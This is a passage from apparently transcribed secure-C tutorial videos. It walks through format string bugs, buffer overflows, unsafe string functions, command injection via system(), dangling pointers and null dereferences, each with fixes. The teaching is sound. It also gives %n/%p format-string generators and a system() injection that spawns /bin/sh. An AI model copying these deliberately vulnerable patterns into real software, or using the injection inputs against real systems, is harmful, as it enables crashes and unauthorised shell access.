the quotation. Now A contains 6. Not only does printf pull variables and substitute them, certain substitutions or certain formatting options like %n write values, and %n writes the number of characters written by printf up until that point. So I wrote 6 characters, A, B, C, D, E, F, and then %n says to write the value into the variable, into the address space at that location. But if we don't specify something and we put a %n in, let's say we put multiple %n's, it's trying to write into spaces that it might not have access to. And hence we see a segmentation fault because we're trying to write 3 variables, 3 %n's, but we've only supplied a single argument. We just have the %a, the address at A. So the way to avoid this, or one of the ways to avoid this, is by not allowing any variable arguments passed into any of the print formatting functions, so all the printf or sprintf, and other functions that allow for formatted character strings like syslog. So anything with the % characters. Don't allow any variable inputs. That's one way of stopping it. We have compiler protections and other stack protections and kernel protections, address space randomization, that can help protect against this. Now, even though it's not as exploitable as it used to be, it is trivial to crash a program if you can specify things like %n and %p and cause some real damage to a program or a system. So we want to avoid this whenever we can. And that concludes this demonstration of basic formatting string weaknesses. In this video, I'll demonstrate how to perform a string buffer overflow in a C program. Strings on the heap are treated differently than strings on the stack. On the heap, we allocate with malloc, and on the stack, we specify a size when we define the string, given a value in square brackets, to say how many characters we need. In this small program, I start on line 1 with an include of stdio, so the standard IO, so we can use our printf function to display our results, include stdlib, the standard library, so we can use malloc and free, and the third include string.h for the strcopy function. Now inside the body of the main function, which I've defined as int main with int argc and char star argv double brackets, on line 7 I have char b and in square brackets 5. So this is a character string with 5 characters. On line 8, I define char star s equal to the malloc of 5 times size of char, an allocated string on the heap with 5 characters, whereas b will be stored on the stack. Then on line 9, char star t equals malloc of 5 times size of char. So s and t are two 5-character strings allocated on the heap, and b is a string allocated on the stack. Then on line 11, I take strcpy with b as the destination, comma, argv indexed at 1. So this will store the first argument to the program in b. And then on line 12, I have strcpy s, comma, argv of 2. So the second argument to the program will be stored into s. Now you probably notice right away that there's no bounds check. And this is by design, because I want to show what happens when we overflow these string buffers. So if the arguments are more than 5 characters, then we're going to have a problem. And then I output the results so that we can see what happens. On line 14, I have printf, and the format string is the string %s, comma, %s, comma, %s, \n. So 3 strings to substitute, followed by a new line character, comma, b, comma, s, comma, t. So we have our strings b, s, and t that will be displayed in that order. And then on line 15, I do a printf. Instead of %s's to display the string, I use %p's, so the string is %p, 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 \n, with b, s, and t to display their memory location. So p is think of it as the pointer address. And then on line 17 and 18, I free s and free t. Because we've allocated with malloc, we need the corresponding free to free up the memory, and then return 0 to finish the program. Now I'll switch over to my terminal window. I'll run gcc of eg-03-04.c, the C program, which will compile it to the file a.out, which I can see here with ls. So /a.out, the first argument, I'm just going to supply a, the second argument, the character b. So the string a and the string b get displayed, the 3 memory locations get printed, and you'll notice that the first one, the b, allocated on the stack is at 0x7ff and some long hexadecimal value, whereas the ones allocated on the heap show as 0x55d as the first few characters. So they're very close. And you'll notice that the strings s and t, their memory locations are very close together. S, the last 2 hex digits are a and 0, and for t, it's c and 0. So s takes up 5 characters, but they're not 5 characters apart. They're actually a full 32 characters or 2 hex digits apart, because c minus a is 20 in hex, which amounts to 32 in decimal. And we're going to use that information in a moment. Now let's try something. Let's do a.out. And instead of a as the first argument, I'm going to pass 1, 2, 3, 4, 5, 6. So there are 6 characters. But you'll remember in the code, b was defined with only 5 characters. And if I run this, the program terminates. It says stack smashing detected, terminated. Nowadays, when we overflow the stack, there are some protections in place to prevent from stack smashing, from writing into the next part of the stack. If I decrease this from /a.out from 1, 2, 3, 4, 5, 6 to 1, 2, 3, 4, 5, followed by the second argument as just whatever, a few characters, it works fine. Now, even though there really isn't space for the null terminating character, remember that with a string in C, using an array of characters, the last character the last space in the memory has to be with the value 0 to null terminate the string. Now let's see what happens if I overwrite the string s. If we look at the addresses, they differ from A0 to C0 of where the strings are allocated. So I'll need to make sure I get that far. So if I pass in an argument 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, and then A, B, C, D, E, F, this is 16 characters. And if we think of it as hexadecimal, these are the 16 hexadecimal digits. So it gives an easy way to go from A to C following the hexadecimal pattern. And if I run it, I run into a problem. So I've gone past the end And when I called free, there was a problem. So free invalid size, aborted core dump. So it crashes the program. But what happens if I go beyond and I put another character off the end, let's say G. So this is 33 characters. So if the memory space is accurate from A0 to C0, at this point, I'm writing in to T's address space. And it does crash, but in the output, all along, the T value was an empty string. So it displayed nothing. So all along, every time I've run the program, there was nothing in T, right from the very start, except now. I get the result of string B, string S, string T now contains the character G. So I've overwritten the contents of S, gone past the end of what was allocated, right into the space allocated for T. And if I put even more characters, that goes even farther. It does cause a problem down the line when I try to free the memory, but I've overwritten another variable, another string, inside of my program. So when we're overflowing a string buffer that's on the heap, we can overwrite past the end of the buffer, the character buffer, and into the next character buffer, whereas with the stack buffer, the string that's stored on the stack, the current protections prevent what's called stack smashing, and it terminates immediately. And that concludes this demonstration on overflowing string buffers. In this video, I'll demonstrate how to apply flags to the GCC compiler to catch string exploits and convert warnings to errors. So I have a small example with a number of warnings that won't be generated by default as errors when they're compiled with GCC. And if we actually run the programs, they'll crash on us. So on line 1, I include standard IO, stdio.h, I include string.h, and then I include stdlib.h, the standard library. On line 5, I declare a function, char star func, with no parameters, and then in the body of the function, I have char s of 10 equals not okay, the string not okay. So obviously this is a problem. We're declaring a local array on the stack, an array of characters, and then we return s. But s is going to be cleaned up and popped off of the stack and no longer be in scope when it returns to the main function. So the compiler should pick this up. Then on line 11, I declare int main with the parameters int argc and char star argv double brackets. Then in the body of the main function on line 13, I have char buffer of size 10. On line 15, I use gets buffer, whereas gets is a very insecure function. Line 16, I have printf of buffer. And line 18, another printf with func, the function call. So we have a couple of formatting string weaknesses and a call to the insecure gets function and a function that returns a variable that's going to be out of scope when it returns. So there are a number of problems with this code. I'll switch over to the terminal window and run gcc of the file eg-03-05.c. And we see a number of warnings, but there are no errors. So the first warning we get is the function returns address of local variable, then an implicit declaration of function gets, and it says, did you mean fgets, which is a problem. Then format not a string literal and no formal arguments. We get that twice because we're calling printf with a string as the string format argument, which is always a problem. So if I run /a.out that was created, and if I pass anything here, if I type in a number of characters, we need to type in some more characters for the gets function. We get stack smashing detected, and the program crashes or terminates. So if I compile, I need to pass a couple of flags in. The most important one is -W error. So the error warning, so this will convert warnings into errors. If I compile it with this set, it shows me that these are very problematic and it highlights them in this terrible red color that stands out like a sore thumb, and we can't avoid it. And our program will not be compiled and we cannot run it. Now, if I do an ls, the file is still there because it compiled the first time, but it didn't compile. And if I remove the file, if I do an rm of a.out, I try to compile again. And with all the warnings, if I do ls, that file does not get created. So we don't have an executable. So it's very important to protect your programs this way, to actually flag these problems and force the compiler to see them as errors and not just warnings. And you can avoid many exploits and make sure you have a clean build each time you generate a new binary. And that concludes this demonstration of compiling string exploits. In this video, I'll demonstrate how to recognize and correct weaknesses introduced by poorly implemented string copying function. So I started my example code with an include of stdio.h, I include string.h, and stdlib.h. So I have the main string libraries that we need to carry out this example. Then I define main on line 5 with int main, int argc, char star argv, double brackets. So the typical main definition. Then in the body of the method, on line 7, I have char r with an initial size of 10, so 10 in square brackets, char s with a size of 10, and char t with a size of 20. Then I define variable len as int len equals 10, which is short for length. So I'll print the initial memory locations of r, s, and t, because I'm going to refer to that when we're getting into the unsafe methods. So on line 12, I do a printf locations r %x, s %x, t %x, followed by \n, and then the variables r, s, and t. So this will show us where these are in memory. Then on line 14, I do a stir copy strcpy into r with argv of 1. Now you can probably see this is unsafe right from the start. And the reason being is we don't check the size of argv of 1. If it's more than 9 characters, or 10 including the null terminator, then we're running into problems. Our buffer r, our character buffer, won't be big enough. But on line 15, I do a strncpy stern copy to copy where we can specify a length. So in this case, I pass s, argv, indexed at 2, so the second argument, followed by len, which is 10. And this should be safer, right? Well, not exactly. And the examples will highlight why. But if argv2 is longer or greater than 10 characters or 10 characters or more, then we run into problems with our null terminator, because our buffer s can only contain 9 characters as a string and has to reserve the 10th for the null terminator. So I have a little comment here. There might be something we're missing. Is s setting s at index len -1, so at index 9, the last character, equal to the null terminating character. On some Unix systems, we have a strl copy, strlcpy, that we can use that will take care of this for us, but it's not generally available on Linux. Then on line 19, I do a print of the variables r, %s, s, %s, \n, and then I pass r and s to see the contents of those particular buffers. So we should see the strings contained in r and s based on what was passed from the command line. And if we do some unsafe actions, then we're going to see something we don't expect. Then on line 21, I have int newlen equals sprintf. So the sprintf or sprintf function prints or writes into a buffer, and it returns the new length of the buffer. So how many characters were copied? The destination is the buffer t, which has a size of 20. Then the format string %s, space %s, then argv of 1, argv of 2. And we should see right away that this is unsafe, because we're not checking the bounds anywhere. So if argv1, argv2, plus the comma and the space character go over 19 characters, then t is going to be a problematic string for us. On line 22, I do printf t length, %d, and then the newlen variable. And then on line 23, printf of t, %s, \n with the variable t. So we print the string contents. So I'll switch over to a terminal window now, to a GCC of this example, and it complains about the memory locations, but it will work fine. It's because it's expecting an unsigned int, but we've given it a char star format, but it will translate that for us. Now I'll run the program with /a.out. Let's do with 1, 2, 3, 4, 5, 6, space 1, 2, 3, 4, 5, 6. So I've got two strings, the numbers 1, 2, 3, 4, 5, 6, so each has 6 characters, and I run it, and everything looks fine. It gives us the memory locations. R contains 1, 2, 3, 4, 5, 6. S contains 1, 2, 3, 4, 5, 6. The sprintf function returns a length of 14. 6 plus 6 plus the 2 characters for the comma and the space gives us 14 characters. And the results of t have the 2 values 1 to 6, comma space 1 to 6. And everything looks fine. But now if I arrow up and modify this, I'm going to change the first variable to 1, 2, 3, 4, 5, 6. 7, 8, 9, 0. So 10 characters, and putting it into a buffer with strcpy that has only 10 characters and no space for a null terminating character will give us some problems. And I'll leave the second argument as 1, 2, 3, 4, 5, 6. And here we see the problem. R now contains 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6. Because there's no null terminating character, it runs off the end of the string. Now, if I reverse this and fix R and bring it back down to 1, 2, 3, 4, 5, 6, and change the second argument that goes into S, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, it seems to work okay. But what about the null terminator? Well, if I go a little bit farther, S still only contains the characters from 1 to 9 and 0, so 10 characters, but that's filling up the entire buffer. And we could start to run into problems here where S starts to overwrite T. So I'm going to make a small change to this program. When I print R and S at the beginning, I'm going to print T as well. So I add T %s on line 19 to the printf, and then add the variable T. Save it, recompile it, and rerun the last line of code I ran with a.out with 1, 2 to 6 and 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3. And if I do this and go a little bit farther each time and just keep adding more characters, I eventually run into a stack smashing. Now I never quite get into the buffer T because we are truncating. Now I'd like to show this that we do run into T. So I'll set T of 0 equal, so I'll insert it before the strcopies, T of 0 equal A, T of 1 equal to the uppercase A as well. So I'm putting some values into T, and if I recompile and rerun that last command, I'll remove a few characters because we don't need to go quite that far, and we see the problem show itself. Now, because T has those two characters AA, when we stop writing into S with the second argument after 0, after we've written 10 characters, the null terminator is dropped. So S, when we print it, we get 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, then AA. So we actually get part of the results out of T at that point, and we start to make a mess of things. The proper way to do this is to copy it using strncopy into S with argv2. We limit it to len, but then we set S of len -1 equal to the null terminator, and we can copy it a little bit more safely. So I'll recompile with GCC and run the last command again. And the result in S, 1, 2, 3, 4, 5, 6, 7, 8, 9, is now truncated to 9 characters. So it doesn't get the full argv1, which we pass to it, with the additional characters 0 to 5. T is fine at that point, and then we protect our stack. And that concludes this demonstration of copying string weaknesses. In this video, I'll demonstrate another insecure method, the gets method, and how dangerous it is, and why compilers today now scream at us when we try to use it. But there's also other methods that we can use that are a little more secure and a little safer to use as an alternative. So let me explain this little example code. We'll run it a few times in a few very insecure ways. Then we'll improve it to see how we can input characters in a way that's a little safer. So on line 1, I include stdio.h. Then I define my main function, int main, with int argc, char star argv double brackets, typical main declaration. And then in the body of main inside of our double braces on line 5, I define char s, and in square brackets 8, so a character string of size 8. On line 7, I call gets s. So gets will wait for user input until the enter or return key is hit, so until it gets a new line. And then on line 8, I do a printf of s to print the result, and then return 0. So let's see why this is really bad. I'll do gcc of eg-03-07.c, and it will compile it to a.out. And already it tells me that I'm doing some bad things. It tells me there's an implicit declaration of function gets. Did you mean fgets? So that's bad. But then printf, I'm just echoing back using printf of s. But that's supposed to be the format string. And it said format, not a literal string, and no format arguments. I covered this one in previous videos, including formatting string weaknesses. But we're going to run it as is. And then at the very end, when it links it, it says, warning, the gets function is dangerous and should not be used. So it's screaming at us, don't use this function, but we're going to use it anyway. So I'll do /a.out, and now it waits for me to enter some string. And I'll type hello. And then it echoes back hello, so what I typed. And everything seems fine. But if I run it again, and this time I'm going to type %p, and it gives me back a memory location. So I'm already getting into dangerous territory where I'm starting to put things in that should not be there. So %p, %n, whatever I want to put in here, I can type in and cause segmentation faults and start to fiddle with things until I find an exploit. So this is a slippery slope into dangerous territory where there's going to be a vulnerability, and this will eventually result in an exploit. Now, if I type /a.out and I type something that goes beyond 8 characters, we get our stack smashing detected. And again, the program terminates, so we crash it. So what can we do here to make this a little safer, a little less insecure, and a little less buggy? Well, for one, we need to change gets to fgets, where we can specify a limit, 8 characters, and we need to specify a source and std in, standard input. So that fixes and makes it a little better. So that's how we should be doing it. Actually, I don't even want to write that. Let's remove it. So we remove the comment entirely, and instead of printf of s, printf of the string %s \n, close the string, and use s as its argument. And now this is better. And I'll save this result, go back to the terminal window, I'll recompile eg-03-07.c, and now when I run a.out and type something in, hello, %p, that actually just says hello %, and the p is truncated because the p is the 8th character. I'll run a.out 1, 2, 3, 4, 5, 6, 7, 8, and all it does is truncate it. Let's do something even bigger. I'll put lots of just random characters in, a few spaces, and again, nothing bad happens. It truncates it to 7 characters plus the null terminator, and I'll run it one last time and put in something like %n, and it just echoes %n without any offense taken. And that concludes this demonstration of catching input vulnerabilities. In this video, I'll demonstrate how to explore command line string inputs that can lead to program weaknesses. I want to demonstrate here how strings can be generated with a little help from Python or Perl or Bash on the command line. So my C program is going to be fairly basic. It's going to be similar to what I did in the video titled Formatting String Weaknesses. On line 1, I have include of standard IO, the stdio.h. On line 3, I define main as int main with int double brackets as its parameters. Then in the body of main, on line 5, I do a printf of argv at 1, so the first argument. And this is very bad, as we've seen before. And then I return 0. So I'll switch over to my terminal window. I'll compile the program gcc of eg-03-08.c. And of course, it gives me a warning that the format is not a string literal. But that's okay, we're just going to use it as is. And if I do a /a.out, and I pass the argument or the string hello, it prints hello. But as we've seen before, if I do /a.out of %p, it prints a memory address. And we start to get into some ugly scenario. But there's something else we can do. We can actually generate strings to pass into a.out. If I do /a.out space, and then I do in double quotes, $, open parenthesis, and then Python3 -c, and then in single quotes, print. And then I'm going to generate a string, %n in quotes times 5. And now we have to be very careful here with all of the quotations and to make sure that we close the quotations properly. And here we get a segmentation fault. So passing a bunch of %n's where printf doesn't have a variable to put the number of bytes written into, because remember, %n puts the value, the number of bytes written by printf up until that point, into the variable that's passed as an argument. So whatever's on the stack. If I do a %p, and I should put a space in, it's going to give me a bunch of memory locations. So it's just popping randomly off the stack, whatever is there at that point in the program, and displays their addresses. And if we look at this command on its own, Python3 -c of print %p space in quotes times 5. So times 5 on a string in Python prints multiples of that string. And if we close our parenthesis and our single quote, and it should be just print, not printf. So Python3 -c, and in single quotes, print, and in parentheses, the string %p space times 5. We get %p space printed 5 times. We could do the same thing in Perl. If you're more comfortable in Perl, -e, single quotes, print, and then in double quotes, the % symbol or %p space x, the actual character x, and then 10 and the quote, and it prints %p 10 times. And I'll demonstrate this in Bash as well for the sake of completeness. So Bash can call printf and then %.s space double %p, because the % symbol is a special character. So if we do it twice, it prints the literal string. Then I'll close my quote. And then in braces, I'll put 1.20. And then I'll close. So it'll do it 20 times. And we get the string %p 20 times. So all of these strings can be used to generate format strings that can be passed into a program, and gives us many ways to exploit format string weaknesses. And I'm going to use that last one, the bash printf of the %p 20 times. And I'm going to pass this into /a.out. So I need to wrap it in quotations, $, parentheses, and then I'll wrap it on the other side. And we get 20 addresses printed from the stack within the program. And that concludes this demonstration of exploiting unsanitized strings by generating string weaknesses. In this video, I'll demonstrate how to check input strings for validity and safety. Arguments passed into programs can be hazardous. There are some simple methods, if used correctly, that can help keep us from falling victim to string exploits, or at least mitigate some of the common problems with respect to string inputs. I'll start on line 1 of this example and run through it before we compile and test it. So on line 1, I have include stdio.h, and I include string.h. Then on line 4, I do a preprocessor define, so hash defined, of max underscore input, all in uppercase, space 16. So we set a maximum input size to 16. Now this has to be program specific. So if you need a certain variable or a certain input to be a certain size or have a maximum size, then it can be set as a preprocessor define. Then in the main function, I have int main with int argc, char star argv double brackets as its parameters. And then in the body of the function on line 8, I have char data, and then in brackets, max underscore input. So I'm creating an array of characters, a string, with 16 characters as its size. Then on line 10, int len equals sn printf of data, max underscore input, the string %s, argv, and in square brackets 1. So the string has the destination data. It'll write as many as max input, so 16 characters maximum. The string format is %s, so it's expecting a string, and it takes it from argv of 1, the first argument. And then it returns len, number of characters actually written. But if argv of 1 has more characters than max input, then it returns how many characters would have been written had it been able to write the entire string. So len just doesn't return how many are written, but how many could have been written had the buffer allowed it. So on line 12, I check if len is greater than or equal to max underscore input, then the data has been truncated. That means there are more characters in argv of 1 than there are in data, and I do a printf of data has been truncated, %u characters, \n. And then I take len, subtract max underscore input, +1. Now I put the +1 in because it's truncated not just the max input, but the maximum character, the last character, is null terminated with the 0 character. Then on line 15, I print the contents of argv of 1, so as %s, and I pass the argv of 1 into this printf format, and then printf of data, %s \n, data, to print the contents, the final contents of data. And then I return 0. So I'll switch over to my terminal window, run gcc on eg-03-09.c, and I'll type ls. And in the contents of this folder, I have a.out, the program that was compiled. So I'll use /a.out to run it, and I'll give it an argument. So I'll just put the word hello. And in this case, argv contains hello, and data contains hello. So I'll arrow up and run this again, but instead of hello, I'll put a string in double quotes, hello, space, world, and then another space, are you there, ? And close the quotation. And in this case, it tells me data has been truncated, 13 characters. argv1 contains the entire string, hello world, are you there? But data contains only hello world, and then the character A from R. So it stops it at 16 characters, actually 15 characters plus the null terminating character. So 13 characters out of the original string were truncated. So from RE space, so 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 characters. So our snprintf function did its job. It made sure that data could not be overflowed, and we safely only store the number of characters that it's able to hold. And that concludes this demonstration of checking strings safely. In this video, I'll demonstrate how to perform loops over characters in a string in a safe manner. So in this example code on line 1, I do an include of standard IO or stdio.h. Then on line 3, I create a preprocessor define using hash define of input underscore max, all in uppercase, and then 10. So our input maximum, the number of characters that we can have or that we want to loop over as a maximum or upper bound, is 10. Then on line 5, I have int main, and its parameters I define as int argc, char star argv, double brackets. And then in the body of the main function, on line 7, I define a pointer s, so char star s equals argv indexed at 1. So I point to the first argument. So I'd like to loop over the characters in argv up to a maximum number of characters. So I want to limit the number of characters because if the input is too large, I want to ignore anything beyond the maximum amount. So on line 9, I create a for loop. For int I equals 0, semicolon, I less than input underscore max, double ampersand, so and s at I is not equal to single quote backslash 0, close single quote. So if the current character that s is pointing to, if it's not the null terminating character, semicolon, I plus plus, we increment the loop counter. And then in the body of the loop, I do a printf, and the first argument, the format string, %c for a single character, comma, s indexed at I. So this will loop over the string up to an input max, or if it reaches the null terminating character, it will print each individual character from the string. And then when it exits the loop, it does a printf \n to put a new line character in. Another loop we can use is a while loop. So I set int I equals to 0. So I have an index or an I to keep track of where we are in the string to make sure we don't go over the input max. Then on line 15, I have a while. And then as the clause for the while loop, I have star s, so the character at s, not equal to the null terminating character, double ampersand, I less than input max. Then in the body of the loop, I do a printf of the string, format string, %c, comma, star s, so the character at s, and then I plus plus, s plus plus. So I increment the s pointer, and I increment the loop counter, I. Then once the loop exits, I do a printf \n and return 0. So I'll switch over to my terminal window. I'll compile this program with gcc eg-03-10.c. And now I'll do a /a.out of hello. And it works, it prints hello, but that's only 5 characters. If I run this again with the string hello, comma space world, exclamation mark, this is definitely more than 10 characters. And it does get truncated. And it gets truncated to 10 characters. So I have hello, which is 5 characters, comma space, WOR. So there are 10 characters, plus the null terminating character. So we have to think about how we want to do this. If we were copying 10 characters into a buffer that could hold 10 characters, we'd want to make sure that the last character is the null terminating character, and we'd probably truncate it at 9. But that wasn't specified here, but we do limit our input to 10 characters. And if you know an upper bound for your expected input, you should always limit it and make sure you stop once you reach that limit, not to bring in any more information than is absolutely required. This can substantially improve your safety and prevent any unintended vulnerabilities. And that concludes this demonstration of looping over strings safely. In this video, I'll demonstrate how to run programs that fail due to unsafe strings. What I'm going to demonstrate here is a direct code injection, a command that executes interpreted commands based on a string. This opens itself up to be used in all sorts of ways, and it's quite trivial to introduce exploits this way, as you'll see here. I'll talk more about this in the video titled Injecting Code in Strings. So in this example, on line 1, I do an include of standardlib stdlib.h, then I include stdio.h. On line 4, I declare my main function int main with the parameters int argc, comma, char star argv, double brackets. And then in the body of this main function, I define a character string char ls of 16. So what ls is going to do is take parameters for the ls command. So on line 8, I do a sprintf of ls, comma, then the string ls space %s, comma, argv of 1. Now I'm not putting the argv values directly into the sprintf format string. So it's not a vulnerability like a formatting string weakness. This is a direct weakness, because on line 10, I call system of ls. So I'm using the system to execute whatever command, the ls command, plus whatever follows it. In the very basic use, I'm just running ls to get a listing. If I switch over to my terminal window, run gcc to compile this, to compile eg-03-11.c, and run /a.out, and I give it an argument with -la. And that just passes la and runs the command ls-la on the current folder. But what if I do /a.out, and then in double quotes, I'm going to put $ampersand. So this will take the command ls, followed by a $ampersand, and then whatever command I want to run. I could even do something like /bin/sh. And when my program runs this, it runs the ls command showing a.out and then eg-03-11.c, and then it gives me a prompt where I can run any command I wish because I've run /bin/sh. And I could do a cat command, or I could do touch new file.txt, or whatever I'd like to run. And basically, I'm here at a command prompt, and I may have not had permissions or access to run a command prompt previously, but I've just escalated into those permissions, and I'm free to do whatever I want. I can browse anywhere in the local file system, so I've basically been given free reign. So there are lots of innocuous ways that we can run code or inject code. We can overflow buffers, we can overflow the stack, and create all sorts of string weaknesses. In this case, the weakness is inherent in the way we're using the string. We're allowing the string to be created by the user and executed directly. This doesn't happen only in running commands like system. This happens in many other languages, such as SQL, many websites that run CGI scripts or fast CGI, any sort of code processed on a web server. There are many services that run commands such as the system command or the process command in Python, or executing local JavaScript, and not to mention SQL injection, where commands are relayed to a SQL server, and if the user inputs some SQL code, and that's used to extract and exfiltrate data or breach data in a SQL or relational database. So this is another vulnerability to do with strings that comes up again and again. Now I'll exit, and I'll conclude this demonstration of executing unsafe strings. In this video, I'll demonstrate how to recognize safe and unsafe methods of returning strings in C. So to begin this example code, I include stdio.h, stdlib.h, and string.h. Then I define my first function on line 5, const char star, func, and no arguments, so just a double parentheses. And the body of the function, all it contains is return the string hello world. So we're returning a constant string, so everything should be fine here. But then on line 9, I have char star func2 with no arguments. The body of this function contains char greeting of size 12 equals the string hello world. So we're defining this hello world, this character array, the string, on the stack. So when we return greeting, when we return the variable, trying to return it to the calling function, this variable is going to be cleaned up because it's a local variable. So we're going outside of its scope, and we're going to lose it. Then on line 14, I have another function, char star func3, and then in the body of this function, I have char star greeting equals malloc of 15 times size of char. Then 16, I do a str copy of greeting, comma, hello world. So we're copying the string hello world into greeting, and then we're returning greeting. Since greeting was allocated with malloc, so it's allocated on the heap, returning greeting is just returning the pointer to that memory on the heap, which does not get cleaned up when the function returns. Now on line 21, I define my main function, int main, with int argc and char star argv double bracket. Then inside this body of this main function, I have printf %s \n func. So I'm calling the function func and printing the string that it returns. So this is okay. But on line 24, I try to do the same thing, the printf of %s \n of func2. But this is not okay because what's getting returned is being cleaned up by the function. So we're going to end up with a problem here. We're going to be pointing to or referring to something on the stack that's no longer there. Then on line 26, I have char star result equals func3. And then I do a printf again of %s \n, result. So this should print okay, but I have a double exclam in my comment saying there's something else we need to do. Because this memory location was assigned with malloc, so it's been allocated on the heap, after we use the result, we need to free it. So if we return memory allocated inside of a function, allocated on the heap, we need to free it once that function result returns. We can't just forget about it. But I'll go over to my terminal window and I'll compile this code, gcc eg-03-13.c, and it does give me a warning telling me that func2, there's a problem. The initializer string for array of chars is too long. So the first problem is we didn't allocate enough space for the string we're assigning. And the second problem is that we're returning a local variable. So I'll fix the size problem. I'll change greeting to 15, and that's more than enough to cover it. I'll recompile and at least get rid of that warning. But I'm going to leave the second one, warning of returning a local address, and run it as is just to see what happens. So I'll run /a.out, and I get the first hello world from the first function. But then when I try to call func2 and do something with the result, it gives me a segmentation fault. So I'll go back to the code and I'll go down to line 24 and just comment out this line so that we can get to the final result. And now if I recompile and run the program again, a.out, I get hello world, hello world. Now if I really wanted to fix it on line 28, after I call the last print, I can do a free of result and everything would be fine. So if I recompile and run it again, I get the same result and everything works fine. But we could run into a problem here if instead of the free after the function returns, we go into the function and before we return greeting, I call free greeting because I want to free it before I return from the function. And I make that change and compile it and then call a.out. I get hello world and then I get nothing. So I'm using this memory after I freed it, which is a use after free problem. So I want to not have that line in there on line 18. I want to remove that from func3 and put it back in on line 28 where I have free result. And the code is better. And that concludes this demonstration of returning strings safely. In this video, I'll demonstrate how to recognize and avoid dangling pointers in a C program. I'll explain this code line by line, and I'll point out places where a pointer will or it might dangle, depending on the circumstances. I'll start on line 1, where I have hash include of stdlib.h, and then a hash include of stdio.h. So we're going to need these for malloc and printf. Then on line 4, a global variable char star g_s. So it's a character pointer called g_s. And then on line 6, I declare a function char star of func, open and close parentheses. So it returns a pointer character, but it doesn't take any arguments. Then on line 8, in the body of the function, I have char c equals the character a. And then on line 10, I return &c. At this point, c will go out of scope. We've declared c on the stack. It's a single character, and when the function returns, that stack information gets lost. So if we return a pointer to it, it will dangle because it's out of scope at that point. On line 13, I have another function, void dangle_danger, double parentheses, because if we don't do this right, then there's a danger of dangling a pointer. So on line 15, I call free of g_s. So g_s is freed at this point, and it is dangling, and if we do something with it, we'll be doing something with a dangling pointer. So in this case, I set g_s equal to null. So as a general rule, if there's a pointer that has the potential to dangle, then we can set it to null to avoid that potential. Of course, we have to keep in mind that we don't want to dereference null after setting it to null, but I'll cover that in the video titled Dereferencing Null. Then I define the main function, int main of int argc, char star argv double brackets. Typical main declaration. Now inside the body of main, I have char star of t, so another character pointer, and then I allocate some space that gs points to with g_s equals malloc of 3. I allocate a buffer of 3 characters. And then the pointer t is equal to g_s. And then I call dangle_danger. And after this happens, inside of the function, we've freed gs and we've set gs equal to null. And if I check it on line 28, if g_s is not equal to null, printf, something went wrong. So if it's not null at this point, then something went really wrong, because we explicitly set it to null inside of the function, and it's a global variable. But on line 31, if t is not equal to null, we do a printf. Now t is dangling, so I print that t is dangling at this point. And it should probably be dangling because we didn't assign it to anything else. And since the buffer it points to, which gs also points to, was freed, t is dangling at this point. And then on line 34, I deal with the first function, func. So char star s equals func. So s at this point is dangling because what was returned is a pointer to something that was on the stack inside the function, and it's no longer valid because it's out of scope. So line 36, I have printf of %s \n, s. I have a comment, this won't work. Well, it shouldn't work because s is dangling. So we'll have to be very careful here. Now I'll switch over to the terminal window, run gcc on eg-04-04.c, our example code, and we should see some warnings, at least one warning, and the important one. It says, warning, function returns address of local variable. So it tells me that there's a problem here. But it's only a warning, everything compiled fine. So if I run /a.out, what was created, we should see some funny things happen. Well, it tells me now t is dangling, and then I get a segmentation fault, because we're dealing with a pointer to a local variable that has gone out of scope. Well, how do we fix that? In the first part, function func is a problem, and we shouldn't be declaring functions like this. So I haven't gone into detail of what the function func is trying to accomplish, but one way to fix it is just to return a character. Instead of returning the pointer, we'll just return c as a character, and I'll scroll down and change the declaration of s. So char s is equal to func, and instead of printing a string, I do %c, so I change line 36, the printf formatting from %s to %c, so we print a single character, and that should fix that problem. But what about dangling t? Well, at this point, if t is not null, and we discover it's null, I can add some braces and put another line in this function, or I could just comment out, now t is dangling, and instead of doing that, I can set t equal to null. Actually, let me change the printf. Instead of say, now t is dangling, now t is not dangling. Now save the code, run gcc on the code again from the terminal window, and run /a.out, and we get now t is not dangling, and we get the character a returned by the function because we're just returning a single value, and we're not returning an invalid pointer. And that concludes this demonstration of dangling pointers. In this video, I'll demonstrate how to recognize and avoid null dereferences in a C program. Although there are a number of different ways that null dereferences occur, I'll demonstrate how easy they are to overlook. So where they come up most frequently are invalid file, device, or socket handles, malloc failures, so memory allocation errors in general, or invalid use of memcopy or memset, where a pointer gets overwritten with 0 or null. Or in general, when a pointer gets explicitly set to null within a function, and without regard to how the pointer may be used after that function call. The programmer must check whether the pointer was modified or set to null if a function might do so. A null dereference most often crashes the program by segfault, but if the program was called by another program, a cascade of failures might happen, resulting in a denial of service, or possibly used by an attacker to exploit it to gain control of it. I'll start with my example code. On line 1, I have hash include of stdlib.h, I include stdio.h, and I include string.h. Then I define a struct on line 5. So struct obj_p, so object p, and in braces, this structure is defined char*buff and size_t of *len. So it points to a character buffer and a length of size t. And then I define a function called dref_buff. So on line 10, I have void dref_buff, and it defines a single parameter struct obj_p *p. And then in the body of this function, on line 12, I have p_buff equals null and p_len equals null. Then the main function I define with int main, int argc, char* argv, double brackets. And then in the body of this function, I declare a variable using struct obj_p *p equals malloc of size of struct obj_p. On line 20, I have char*b equals malloc 10, so a character buffer of size 10. Then I do a stern copy strncpy into b, argv of 1, so the first argument, 9. So we limit it to 9 characters to make sure we have room for the null terminating character. And then on line 22, I have size_t of n equals the *len of b, whatever the actual length is, which in this case will be 9 at most. Then on line 24, I have p_buff equals b, so we're pointing to the buffer b, and p_len equals &n, so a reference to n. Then on line 27, I print the contents of b, printf %s\n, b, and then printf len : %lu for a long unsigned integer, n. So we're going to print the contents of the buffer b, and then len n. So we get a string and a length of the string. Then on line 30, if I uncomment this line, dref_buff of p, we pass p into the function, buff and len get set to null, and then when we come out of the function, we free b, and then set n equal to 0, and then on line 34 is where we run into problems. The conditional if, and in parentheses 0 less than *p len. So at this point, I dereference len if it's set to null. So if the dref_buff function is called, then we have a dereference problem here, a dereference of null. If it succeeds, I do a printf of %lu\n, so the formatted print of *p len, and then I return 0 at the end of the function. So I'll comment out the dref_buff, and we can see it runs successfully and see what happens. Then I'll come back and uncomment it, recompile, and run it again to see what happens the second time. Now I'll switch over to terminal window, run gcc of our eg-04-05.c, 